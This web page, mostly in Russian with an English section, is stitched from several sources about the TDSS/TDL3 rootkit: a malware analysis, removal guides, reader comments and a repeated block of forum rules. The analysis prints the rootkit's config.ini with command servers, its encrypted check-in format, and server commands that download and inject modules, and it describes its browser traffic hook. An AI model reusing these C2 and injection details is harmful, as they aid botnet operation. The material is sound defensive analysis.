Что такое вирус tdss

Данный драйвер для обеспечения своей последующей автозагрузки заражает системный драйвер обслуживающий физический диск, где находится ОС (например, atapi.sys). Оригинальные байты из зараженного драйвера и сам основной код руткита сохраняются в последних секторах диска. Там же организует скрытый шифрованный виртуальный диск. На этот диск записываются компоненты пользовательского режима tdlcmd.dll, tdlwsp.dll и файл конфигурации config.ini. Руткит модуль скрывает все изменения в системе и осуществляет внедрение компонент пользовательского режима в процессы согласно файлу конфигурации.

Пример. Содержимое файла config.ini

[main]
version=3.0
botid=4513c055-11f2-8278-7863-3d82b9b804c8
affid=10002
subid=0
installdate=1.10.2009 9:4:38
[injector]
svchost.exe=tdlcmd.dll
*=tdlwsp.dll
[tdlcmd]
servers=https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/

Модуль, отвечающий за обновления вредоносной программы и её компонент с управляющего сервера. Из собственного имени извлекает путь к виртуальному диску, созданному руткит-драйвером и считывает данные из файла config.ini об управляющих серверах, идентификаторе бота и т.д. Получает информацию о версии системы, языке системы и браузере по-умолчанию. Эти данные представляются в виде строки:

4513c055-11f2-8278-7863-3d82b9b804c8|10002|0|3.0|3.1|5.1 2600 SP1.0|ru-ru|iexplore
(botid|affid|Subid|bot_version|loader_version|system_version|locale|browser)

Она сначала шифруется RC4 с ключом в виде имени сервера (например: h3456345.cn), затем кодируется в base64. И полученный запрос отправляется на сервер.

В ответ получает зашифрованный набор инструкции и исполняет их. Инструкции представляют собой имена функций в загруженных модулях вредоносной программы и их параметры.

botnetcmd.ModuleDownloadUnxor('https://h3456345.cn/2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==', '\\?\globalroot\systemroot\system32\botnetwsp8y.dll')
botnetcmd.InjectorAdd('*','botnetwsp8y.dll')
botnetcmd.SetCmdDelay(14400)
botnetcmd.FileDownloadRandom('https://h3456345.cn/2c0lfrNDklZZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==','\\?\globalroot\systemroot\system32\botnet.dat')
tdlcmd.ConfigWrite('tdlcmd','delay','1800')
tdlcmd.ConfigWrite('tdlcmd','servers','https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/')

ссылки в параметрах представляют из себя зашифрованные команды серверу, например "2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==" это "module|1!4513c055-11f2-8278-7863-3d82b9b804c8!", файлы скачиваемые по таким ссылкам зашифрованы идентификатором бота (4513c055-11f2-8278-7863-3d82b9b804c8)

Так в данном случае, botnetwsp8y.dll является обновлением для модуля tdlwsp.dll, а botnet.dat это список командных серверов

Внедряется согласно файлу конфигурации во все процессы, но работает только в тех имена которых содержат подстроки explore, firefox, chrome, opera, safari, netscape, avant, browser. Перехватывает функцию mswsock.dll!WSPStartup. В обработчике перехваченной функции WSPStartup, подменяет в таблице SPI(service provider interface) процедуры WSPSend, WSPRecv и WSPCloseSocket на свои. Т.о. работая как классический LSP (Layered Service Provider)

С этого момента вредоносная программа полностью контролирует пользовательские запросы и способна подменять результаты поисковых машин и перенаправлять пользователя на вредоносные сайты. Информация о перенаправлении и реакции на ключевые слова приходит от командного сервера.

Троян TDSServ — это опасный троян, так же известный под именами Backdoor.Win32.TDSS, Backdoor.TDSS и Backdoor.Tidserv. Это очень опасный троян который использует руткит технологии для того чтобы скрыть собственное присутствие на компьютере. Для этого троян TDSServ использует разные имена для своих компонентов, регистрирует основной компонент как скрытый драйвер, а так же перехватывает обращение к реестру и файловой системе. Поэтому с помощью большинства программ вы даже не сможете найти файлы этого трояна.
После заражения блокируется доступ пользователя к большинству антивирусных сайтов, а также запуск антивирусных и антиспайварных программ. Троян TDSServ распространяется не в одиночку, а в основном он идёт в комплекте с трояном (trojan.fakealert), который показывает поддельные сообщения о заражении компьютера и предлагающего скачать и установить на компьютер поддельную антиспайварную программу.

1. Отключаем основной компонент (скрытый драйвер) трояна TDSSserv.

• Кликните правой клавишей мыши по иконке Мой компьютер.
• В открывшемся меню выберите пункт Свойства.
• В открывшемся окне Свойства системы выберите вкладку Оборудование.
• Кликните по кнопке Диспетчер устройств.
• Кликните Вид, в открывшемся меню кликните по пункту Показать скрытые устройства.
• В списке устройств найдите пункт Драйверы устройств не Plug and Play.
• Кликните по + слева от наименования этого пункта.
• В открывшемся списке кликните правой клавишей по пункту TDSSserv или TDSSserv.sys или TDSSxyz.sys где xyz случайные символы. Так же отключите драйвера clbdriver.sys, seneka.sys (это тоже трояны, которые могут идти в комплекте).
• В открывшемся меню выберите Отключить.
• Кликните Да для подтверждения ваших действий.
• Закройте все окна и перезагрузите компьютер.

2. Удаляем троян TDSSserv

• Скачайте программу Avenger кликнув по этой ссылке и распакуйте её на Рабочий стол.
• Запустите и скопируйте ниже приведённый текст в Input script Box:
  

Drivers to delete:
TDSSserv.sys
clbdriver.sys
seneka.sys

3. Удаляем сопутствующие вредоносные программы.

• Скачайте программу Malwarebytes Anti-Malware и установите её на компьютер. Запустите.
• Откройте закладку Обновления, и кликните по кнопке Проверить обновления.
• Откройте вкладку Сканер, и кликните по кнопке Проверить.
• После сканирования кликните OK, вам будет показан результат сканирования.
• Удалите всё что было найдено.

%Temp%\file.exe
%Temp%\TDSS[случайные_символы].tmp
%System%\drivers\TDSS[случайные_символы].sys
%System%\TDSS[случайные_символы].sys
%System%\TDSS[случайные_символы].dat
%System%\TDSS[случайные_символы].log
%System%\TDSSerrors.log
%System%\TDSSservers.dat
%System%\TDSSl.dll
%System%\TDSSlog.
%System%\TDSSmain.dll
%System%\TDSSinit.dll
%System%\TDSSlog.dll
%System%\TDSSadw.dll
%System%\TDSSpopup.dll

Если у вас возникли вопросы по этой инструкции или она вам не помогла, то обратитесь на наш компьютерный форум.

Моё имя Валерий. Я сертифицированный специалист в области компьютерной безопасности, выявления источников угроз в ИТ инфраструктуре и анализе рисков с опытом работы более 15 лет. Рад поделиться с вами своими знаниями и опытом.

Комментарии

Валерий, огромное Вам СПАСИБО за подробную инструкцию по удалению вируса TDSSery (Троян). ВСЁ ПОЛУЧИЛОСЬ. До удаления вируса его обнаруживали, но он не удалялся, компьютер стал как-то странно задумчив, перестал работать дефрагментатор диска. Следуя Вашей инструкции мне удалось обнаружить и удалить 9 зараженных файлов. Дефрагментатор заработал. Ваша инструкция так понятна и подробна, что работать с ней смог даже такой

Большая благодарность автору за эту статтю, я уже подумивал переустанавить
Windows, пока не прочитал статтю Валерия. С помощю ее я успешно удалил этого
трояна.
. БОЛЬШОЕ СПАСИБО .

и Спасибо за статью очень помогла. Что самое интересное стоял нод32 обновлялся 2 раза в день, все защиты включены были и пропустил его и при ручном сканирование не находил. А по вашей статья за пару минут убил гада 🙂

Koroche bratan , ogromnoye spasibo za konkretnuyu pomosh\’.
Na eisai kala , glitosa apo polli mbela . Epitelous to ksefortothika to gamimeno io .
It caused a lot of trouble to me . But now thanks to your advice it\’s evenually gone .
Vsego tebe horoshego i prodolzhay dal\’she pomogat\’ liudiam !

СПАСИБКИ . Проверено работает 100%,удалил back door.tdss.82.

Если в Windows отключить возможность дистанционного управления компьютером, то и подобные вирусы исключены. А когда вы коннектитесь к компу, вводите логин и пароль и комп открывает Вам двери, то такая система почти всегда обречена. Некоторую часть Windows следует переписать заново, поскольку ее главный сетевой модуль как раз тем и занимается, что выкачивает дрянь с сети и запускает и никак этот модуль не остановить.
=(

Трояны поражают компьютеры через очень большое кол-во уязвимостей. 90 процентов из них — это багив IE.

Кликните правой клавишей мыши по иконке Мой компьютер.
В открывшемся меню выберите пункт Свойства
*******
Я не могу этого сделать. Троян блокирует

Ира, сразу перейдите ко второму шагу.

Здраствуйте! Помогите пожалуйта! я пыталась удалить троян по вашей инструкции-но когда открыла драйвера устройств не Plug and Play, то не обнаружила там TDSSserv.sys,clbdriver.sys,seneka.sys((((( Что мне делать? Я когда открываю браузер интернет эксплор вместо обычного окна выходит окно с оповещанием о том что комп заражен трояном и что надо отослать смс для активации OKEV чтоли …….Пожалуйста помогите мне
Нфтфлья

nataly, наиболее вероятно, ваш компьютер заражён другим трояном. Обратитесь на наш форум за помощью.

- Ничччего не понимаю

(М/ф Колобки)

На компьютере установлена Windows XP SP3, антивирусник MSE, файерволл COMODO.

Нехорошие сайты работающие на компьютере не посещают.

9.04.13 устанавливала Foxit Reader. Во время установки блокноты рабочего стола то исчезали, то появлялись. После установки они произвольно, как решили сами, изменили свое местоположение.

10.04.13 после неординарной ситуации проверила компьютер GMERом (.лог - GMER_не по правилам) без установки рекомендуемых галочек, который выявил, насколько я поняла, руткит TDSS в spoolsv.exe.

После посещения форума по рекомендациям проверила компьютер всеми рекомендуемыми программами. В частности, по личной инициативе, еще и GMERом (лог GMER_по правилам).

Но. Проверка ничего не обнаружила.

Заранее прошу простить: невнимательно прочитала рекомендации. Пришлось проверять папку Documents & Settings отдельно (.cureit_Documents & Settings.log)

Все логи находятся в архиве ВСЕ ЛОГИ.rar

Лог DrWebSysInfo.log не поместила в архив ВСЕ ЛОГИ.rar, т.к. он уже есть в архиве со сведениями о системе.

Спасибо за помощь и рекомендации.

P/S Новая версия Dr.WEB CureIt и по интерфейсу, и по скорости - потрясающая.

1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,

Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.

2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,

3. Если у Вас зашифрованы файлы,

Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.

4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig

Для этого проделайте следующее:

• Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить.
• В появившемся окне наберите cmdи нажмите клавишу . Появится черное окно консоли (интерпретатора команд).
• Напишите в этом черном окне команду ipconfig /all>"%userprofile%\ipc.log" и нажмите клавишу , затем наберите там же команду explorer.exe /select,"%userprofile%\ipc.log" и нажмите клавишу , нужный файл будет показан в Проводнике Windows.
• Приложите этот файл к своему сообщению на форуме.

1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,

Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.

2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,

3. Если у Вас зашифрованы файлы,

Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.

4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig

Для этого проделайте следующее:

• Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить.
• В появившемся окне наберите cmdи нажмите клавишу . Появится черное окно консоли (интерпретатора команд).
• Напишите в этом черном окне команду ipconfig /all>"%userprofile%\ipc.log" и нажмите клавишу , затем наберите там же команду explorer.exe /select,"%userprofile%\ipc.log" и нажмите клавишу , нужный файл будет показан в Проводнике Windows.
• Приложите этот файл к своему сообщению на форуме.

Спасибо за действительно ценные рекомендации.

• March 2, 2010

What is TDSS, Alureon, or TDL3 Rootkit?

TDSS, or TDL3, is the name of a family of rootkits for the Windows operating system that downloads and execute other malware, delivers advertisements to your computer, and block programs from running. This rootkit infects your computer in various ways that include replacing hard disk drivers with malicious versions. Once a computer is infected, TDSS will be invisible to Windows and anti-malware programs while downloading and executing further malware and delivering advertisements to your computer. This particular infections is detected under various names depending on the particular anti-virus vendor. A list of vendors and their detection names for TDSS can be found below.

While infected, the files and services associated with TDSS will be invisible, but there are symptoms that the TDSS infection may display. These symptoms include:

Google search result links will be redirected to unrelated sites. When you search through Google and click on one of the search results, instead of going to the correct page you will instead be redirected to an advertisement. It should be noted that some of the domains you are redirected to are legitimate companies, but that may have affiliates that promote their products in a dubious manner.

The inability to run various programs. When you attempt to run certain programs, you will not receive an error, but they simply will not start. TDSS has a configuration setting called disallowed that contains a large list of programs that it will not allow to execute. It does this so that you cannot launch anti-virus and anti-malware programs that may help you remove this infection.

As you can see, the TDSS rootkit is an intrusive infection that takes over your machine and is very difficult to remove. Thankfully, Kaspersky Labs has released a tool called TDSSKiller that can be used to remove most variants of TDSS from your computer. We do, though, need to perform some steps in order to get the program to work. These steps are described in the removal guide below.

TDSS, Alureon, or TDL3 Rootkit Removal Options

Self Help Guide

This guide contains advanced information, but has been written in such a way so that anyone can follow it. Please ensure your data is backed up before proceeding.

If you are uncomfortable making changes to your computer or following these steps, do not worry! Instead you can get free one-on-one help by asking in the forums.

1. The first thing you need to do is download tdsskiller from the following link and save it to your desktop.

When you get to the above page, please click on the Download EXE button to download the file. If you are unable to download the file for some reason, then TDSS may be blocking it. You would then need to download it first to a clean computer and then transfer it to the infected one using an external drive or USB flash drive.

Once the file has completed downloading, you should now have the TDSSKiller icon on your desktop as shown below.

Once the file is renamed, you should double-click on it to launch it. When you run the program, Windows may display a warning similar to the image shown below.

If you receive this warning, please click on the Run button to allow TDSSKiller to run. If you did not receive this warning, then TDSSKiller should have started and you can proceed to step 6.

TDSSKiller will now start and display the welcome screen as shown below.

At this screen click on the Start scan button to have TDSSKiller scan your computer for the TDSS infection.

TDSSKiller will now scan your computer for the TDSS infection. When the scan has finished it will display a result screen stating whether or not the infection was found on your computer. If it was found it will display a screen similar to the one below.

To remove the infection simply click on the Continue button and TDSSKiller will attempt to clean the infection. If it does not say Cure, leave it at the default action of Skip and press the Continue button. Do not change it to Delete or Quarantine as it may delete infected files that are required for Windows to operate properly.

When it has finished cleaning the infection you will see a report stating whether or not it was successful as shown below.

As you can see from the above screen, TDSSKiller was able to clean the TDSS infection, but requires a reboot to finish the cleaning process. Click on the Reboot now button to reboot your computer and finish the removal of the TDSS infection from your computer.

I now suggest that you scan your computer using MalwareBytes' to remove any traces that may still be present. A tutorial on how to use MalwareBytes' can be found here:

If TDSSKiller was unable to remove the TDSS infection, even though it detected it but was unable to cure it, then you should follow the steps here to request assistance from one of our malware removal experts:

C:\WINDOWS\_VOID \ C:\WINDOWS\_VOID \_VOIDd.sys C:\WINDOWS\system32\UAC .dll C:\WINDOWS\system32\uacinit.dll C:\WINDOWS\system32\UAC .db C:\WINDOWS\system32\UAC .dat C:\WINDOWS\system32\uactmp.db C:\WINDOWS\system32\_VOID .dll C:\WINDOWS\system32\_VOID .dat C:\WINDOWS\SYSTEM32\4DW4R3c.dll C:\WINDOWS\SYSTEM32\4DW4R3sv.dat C:\WINDOWS\SYSTEM32\4DW4R3 .dll C:\WINDOWS\system32\drivers\_VOID .sys C:\WINDOWS\system32\drivers\UAC .sys C:\WINDOWS\SYSTEM32\DRIVERS\4DW4R3.sys C:\WINDOWS\SYSTEM32\DRIVERS\4DW4R3 .sys C:\WINDOWS\Temp\_VOID tmp C:\WINDOWS\Temp\UAC .tmp %Temp%\UAC .tmp %Temp%\_VOID .tmp C:\Documents and Settings\All Users\Application Data\_VOIDmainqt.dll

File Location Notes:

%Temp% refers to the Windows Temp folder. By default, this is C:\Windows\Temp for Windows 95/98/ME, C:\DOCUMENTS AND SETTINGS\ \LOCAL SETTINGS\Temp for Windows 2000/XP, and C:\Users\ \AppData\Local\Temp in Windows Vista, Windows 7, and Windows 8.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\_VOIDd.sys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\_VOID HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UACd.sys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\4DW4R3

If you have any questions about this self-help guide then please post those questions in our Am I infected? What do I do? and someone will help you.